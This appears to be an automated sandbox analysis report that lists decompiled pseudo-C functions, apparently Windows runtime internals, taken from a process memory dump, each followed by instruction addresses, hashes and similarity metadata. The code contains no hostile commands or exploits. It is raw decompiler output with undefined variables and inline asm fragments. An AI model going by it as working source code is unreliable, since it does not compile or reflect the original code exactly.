				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x4c5d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E04BE6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E04BE6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E04B87D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E04BA9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E04BAB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L04B84620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x04be7016
0x04be701e
0x04be702b
0x04be7033
0x04be7037
0x04be703c
0x04be703e
0x04be7041
0x04be7045
0x04be704a
0x04be7050
0x04be7055
0x04be705a
0x04be7062
0x04be7062
0x04be705a
0x04be7064
0x04be7064
0x04be7067
0x04be7071
0x04be7096
0x04be709b
0x04be70a2
0x04be70a6
0x04be70a7
0x04be70ad
0x04be70b3
0x04be70b6
0x04be70bb
0x04be70c3
0x04be70c3
0x04be70c6
0x04be70cd
0x04be70dd
0x04be70e0
0x04be70e2
0x04be70e2
0x04be70ee
0x04be7101
0x04be70f0
0x04be70f9
0x04be70f9
0x04be710a
0x04be710e
0x04be7112
0x04be7117
0x04be7118
0x04be7118
0x04be70bb
0x04be711d
0x04be7123
0x04be7131
0x04be7131
0x04be7136
0x04be713d
0x04be713e
0x04be713f
0x04be714a
0x04be714a
0x04be7084
0x04be7088
0x00000000
0x04be708e
0x04be708e
0x04be7092
0x00000000
0x04be7092

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5bab4f90455e08e043b8afbc3a726018e05343ec2e7c90de97dbc5161c62fe
Instruction ID: 534ff218df24cc2cb4eca9ab11686f715da85992a37c490e5389abd4555af8b0
Opcode Fuzzy Hash: 8d5bab4f90455e08e043b8afbc3a726018e05343ec2e7c90de97dbc5161c62fe
Instruction Fuzzy Hash: 4831B3726047519BC320DF69C941A7AB3E9FFC8700F044A6DF89587690EB31F914C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 04B8C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04B8C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E04B87D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E04C38D34(_v8, _t80);
					}
					E04B82280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E04B7FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E04C38833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E04B7FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E04BAB180();
						if(_a4 != 0) {
							E04B82280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E04B8BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E04B8BB2D(_t16, _t15);
						E04B8B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E04B7FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E04B7FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E04B7FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x04b8c18d
0x04b8c18f
0x04b8c191
0x04b8c19b
0x04b8c1a0
0x04b8c1d4
0x04b8c1de
0x04bd2d6e
0x04b8c1e4
0x04b8c1e4
0x04b8c1e4
0x04b8c1ec
0x04bd2d7d
0x04bd2d7d
0x04b8c1f3
0x04b8c1ff
0x04bd2d88
0x04bd2d8d
0x04bd2d94
0x04bd2d94
0x04bd2d9f
0x04bd2da4
0x04bd2dab
0x04bd2db0
0x04bd2db2
0x04bd2db3
0x04bd2db4
0x04bd2dbc
0x04bd2dc3
0x04bd2dc3
0x04b8c205
0x04b8c205
0x04b8c208
0x04b8c20e
0x04b8c211
0x04b8c216
0x04b8c219
0x04b8c21f
0x04b8c222
0x04b8c22c
0x04b8c234
0x04b8c23a
0x04b8c23f
0x04b8c245
0x04b8c24b
0x04b8c251
0x04b8c25a
0x04b8c276
0x04b8c27d
0x04b8c27d
0x04b8c25c
0x04b8c25c
0x00000000
0x04b8c25e
0x04b8c1a4
0x04b8c1aa
0x04b8c1b3
0x04b8c265
0x04b8c26c
0x04b8c26c
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 0e990496caa82b6013315aecd49736ded9d33be3455d0fc20228f759ca5ce8f4
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 523128B1705586AEEB08FFB4C480BE9FB64FF42248F1441DED5284B241DB34BA15D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04B9A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04B9A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x4c57b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x4c57b10 = 8;
					 *0x4c57b14 = 0x4c57b0c;
					 *0x4c57b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E04B9A990(0x4c57b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L04B9A840(__edx, __ecx, __ecx, _t52, 0x4c57b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x4c57b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x4c57b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x4c57b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L04B84620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x4c57b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E04BAF3E0(_t50,  *0x4c57b14, _t8 >> 3);
						_t28 =  *0x4c57b14; // 0x776f7b0c
						__eflags = _t28 - 0x4c57b0c;
						if(_t28 != 0x4c57b0c) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x4c57b14 = _t50;
						_t48 = _v12;
						 *0x4c57b10 = _t9;
						goto L6;
					}
					 *0x4c57b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x04b9a713
0x04b9a714
0x04b9a717
0x04b9a71d
0x04b9a720
0x04b9a722
0x04b9a727
0x04b9a74a
0x04b9a754
0x04b9a75e
0x04b9a768
0x04b9a76a
0x04b9a773
0x04b9a78b
0x04b9a790
0x04b9a792
0x04b9a741
0x04b9a741
0x04b9a743
0x04b9a749
0x04b9a749
0x04b9a732
0x04b9a73a
0x04b9a797
0x04b9a79d
0x04b9a7a3
0x04b9a7a9
0x04b9a7b6
0x04b9a7bc
0x04b9a7ca
0x04b9a7e0
0x04b9a7e2
0x04b9a7e4
0x04bd9bf2
0x00000000
0x04bd9bf2
0x04b9a7ed
0x04b9a7f2
0x04b9a800
0x04b9a805
0x04b9a80d
0x04b9a812
0x04bd9c08
0x04bd9c08
0x04b9a818
0x04b9a81b
0x04b9a821
0x04b9a824
0x00000000
0x04b9a824
0x04b9a7ae
0x00000000
0x04b9a7ae
0x04b9a73c
0x04b9a73e
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d31363247e720ed2d0e68ddfe2f0e557f582d3c9844eca99319ba43105dae5
Instruction ID: bf606023edc8d38fa05b11caa8bd33a11ddb147c937d35f1f8da83736ea221b0
Opcode Fuzzy Hash: 67d31363247e720ed2d0e68ddfe2f0e557f582d3c9844eca99319ba43105dae5
Instruction Fuzzy Hash: C531AFB56023419BDB11CF18D881F6977FEFB88714F1449AAE405A7240E779BDC1CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04B961A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04B961A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04B95E50(0x4b467cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E04C39D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E04B6F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x04b961b3
0x04b961b5
0x04b961bd
0x04b961c3
0x04b961c7
0x04b961d2
0x04b961ff
0x04b961ff
0x04b96201
0x04b96207
0x04b96207
0x04b961d4
0x04b961d9
0x00000000
0x00000000
0x04b961df
0x04b961e2
0x00000000
0x00000000
0x04b961e6
0x04b961e8
0x04b961ee
0x04b961ee
0x04b961f9
0x04bd762f
0x04bd7632
0x04bd7635
0x04bd7639
0x04bd7640
0x04bd766e
0x04bd7675
0x00000000
0x00000000
0x04bd7681
0x04bd7689
0x04bd768d
0x04bd7691
0x04bd7695
0x04bd7699
0x04bd76af
0x04bd76b5
0x04bd76b7
0x04bd76b7
0x04bd76d7
0x04bd76dc
0x00000000
0x04bd76dc
0x04bd76a2
0x04bd76a9
0x04bd7651
0x04bd7653
0x04bd7653
0x04bd7656
0x04bd7656
0x00000000
0x04bd7656
0x04bd7644
0x04bd7646
0x04bd7648
0x04bd7648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10542c7d3f7c7351d075cebb64ba687a06f7880ed428f2beb772de7032396f24
Instruction ID: f911570698d6cde6b7cdd176714627f2ee3383f605daa12d91b825a6a1c12e86
Opcode Fuzzy Hash: 10542c7d3f7c7351d075cebb64ba687a06f7880ed428f2beb772de7032396f24
Instruction Fuzzy Hash: 29317A716097118FD720DF19C800B6AB7E5FB88B00F1549ADE9989B351FBB0EC04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B6AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E04B6AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x4c5d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x4c57b9c; // 0x0
					_t53 = L04B84620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E04BAB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E04BAF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04B76C59(_t53, _t51, _t58) != 0) {
							_t28 = E04B95E50(0x4b4c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E04B9B230(_v32, _v28, 0x4b4c2d8, 1,  &_v24);
								_t28 = E04B6F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x04b6aa25
0x04b6aa29
0x04b6aa2d
0x04b6aa30
0x04b6aa37
0x04b6aa3c
0x04bc4458
0x04bc4458
0x04bc4472
0x04bc4474
0x04bc4476
0x04b6aa64
0x04b6aa74
0x04bc447c
0x04bc4483
0x04bc4492
0x04b6aa52
0x04b6aa54
0x04b6aa5e
0x04bc44a8
0x04bc44ad
0x04bc44af
0x04bc44b6
0x04bc44b6
0x04bc44b9
0x04bc44bc
0x04bc44cd
0x04bc44d3
0x04bc44d6
0x04bc44e1
0x04bc44e1
0x04bc44e6
0x04bc44e8
0x04bc44fb
0x04bc44fb
0x04bc44e8
0x00000000
0x04b6aa5e
0x04bc4476
0x04b6aa42
0x04b6aa46
0x04b6aa48
0x04b6aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2d4f9f341984710db1173a66ce01751b7caa43f47692d5d2704aec04434a6d4
Instruction ID: 3b02f5b7e3335a525f3ea67d6f7868953a6f2ff13948abc53137d17b235df436
Opcode Fuzzy Hash: d2d4f9f341984710db1173a66ce01751b7caa43f47692d5d2704aec04434a6d4
Instruction Fuzzy Hash: DC31D671A00219ABDF109F64CD81A7FB7B8EF04704B1140EAF801E7150EB78BE51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04BA8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04BA8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x4c5d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04B94E70(0x4c586e4, 0x4ba9490, 0, 0);
					if( *0x4c553e8 > 5 && E04BA8F33(0x4c553e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x4c553e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x4c553e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x4b4bc46;
						_t48 = E04BE7B9C(0x4c553e8, 0x4b4bc46, _t67, 0x4c553e8, _t70,  &_v140);
					}
				}
				return E04BAB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x04ba8ec7
0x04ba8ed9
0x04ba8edc
0x04ba8ee6
0x04ba8ee9
0x04ba8eee
0x04ba8efc
0x04ba8f08
0x04be1349
0x04be1353
0x04be135d
0x04be1366
0x04be136f
0x04be1375
0x04be137c
0x04be1385
0x04be1390
0x04be1391
0x04be139c
0x04be139d
0x04be13a6
0x04be13ac
0x04be13b2
0x04be13b5
0x04be13bc
0x04be13bf
0x04be13c2
0x04be13c5
0x04be13c8
0x04be13cb
0x04be13ce
0x04be13d1
0x04be13d4
0x04be13d7
0x04be13da
0x04be13dd
0x04be13e0
0x04be13e3
0x04be13e6
0x04be13e9
0x04be13f6
0x04be1400
0x04be1400
0x04ba8f08
0x04ba8f32

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6665bfb545367a652428c20444a6421fc36cde16d4589543deb60a43e4494f
Instruction ID: c5a467e7a7321d0a27fc80a63c9e0dcb1471a653b351c596ac0649dbe637ad51
Opcode Fuzzy Hash: 9f6665bfb545367a652428c20444a6421fc36cde16d4589543deb60a43e4494f
Instruction Fuzzy Hash: 3041A4B1D043189FDB24DFAAD980AADFBF4FB48314F5041AEE519A7600E7746A84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04BA4A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E04BA4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x4c5d360 ^ _t62;
				_v8 =  *0x4c5d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04B82280(_t26, 0x4c58608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E04B7FFB0(_t41, _t51, 0x4c58608);
						L2:
						 *0x4c5b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E04BAB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04B82280(_t28, 0x4c58608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E04B7FFB0(_t42, _t53, 0x4c58608);
							if(_t53 != 0) {
								L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E04B7FFB0(_t41, _t51, 0x4c58608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x04ba4a2c
0x04ba4a34
0x04ba4a3c
0x04ba4a3e
0x04ba4a48
0x04ba4a4b
0x04ba4a4d
0x04ba4a51
0x04ba4a9c
0x00000000
0x00000000
0x04ba4aa3
0x04ba4aa8
0x04ba4aad
0x04ba4ab1
0x04ba4ade
0x04ba4ae3
0x04ba4a5a
0x04ba4a62
0x04ba4a6a
0x04ba4a6e
0x04bdf203
0x04ba4a84
0x04ba4a88
0x04ba4a89
0x04ba4a8a
0x04ba4a95
0x04ba4a95
0x04ba4a79
0x04ba4a80
0x04ba4af2
0x04ba4af4
0x04ba4af9
0x04ba4aff
0x04ba4b01
0x04ba4b03
0x04ba4b08
0x04bdf20a
0x04bdf212
0x04bdf216
0x04bdf216
0x04ba4b08
0x04ba4b13
0x04ba4b1a
0x04bdf229
0x04bdf229
0x04ba4b1a
0x04ba4a82
0x00000000
0x04ba4a82
0x04ba4ab7
0x04ba4acd
0x04ba4acd
0x04ba4ad5
0x04ba4ada
0x00000000
0x04ba4ada
0x04ba4ac2
0x04ba4acb
0x00000000
0x00000000
0x00000000
0x04ba4acb
0x04ba4a53
0x04ba4a53
0x04ba4a58
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1544c6a4d705e6f09c7467b0dda9f9fe41d6b9461810a5ac80ff60e0c8025d30
Instruction ID: 6e1302a787c515a4666f2c246ac2559b552bcc2e628af9ad3fdd429b40cfbdf9
Opcode Fuzzy Hash: 1544c6a4d705e6f09c7467b0dda9f9fe41d6b9461810a5ac80ff60e0c8025d30
Instruction Fuzzy Hash: 56313832209310DBD721EF24C941B2ABBE5FFC0714F0044E9E8560B250DBB0F861CB99

Uniqueness

Uniqueness Score: -1.00%

Function 04B9E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04B9E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E04BA9670() < 0) {
